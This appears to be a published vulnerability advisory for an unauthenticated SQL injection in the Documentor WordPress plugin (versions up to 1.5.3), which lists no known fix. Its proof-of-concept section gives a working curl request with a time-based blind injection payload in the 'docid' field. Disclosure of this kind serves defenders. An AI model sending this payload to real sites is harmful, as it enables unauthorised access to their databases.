WordPress Plugin Vulnerabilities

Documentor <= 1.5.3 - Unauthenticated SQLi

Description

The plugin fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=doc_search_results&term=&docid=1 AND (SELECT 6288 FROM (SELECT(SLEEP(5)))HRaz)'

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-04-05 (about 2 years ago)
Added
2022-04-05 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other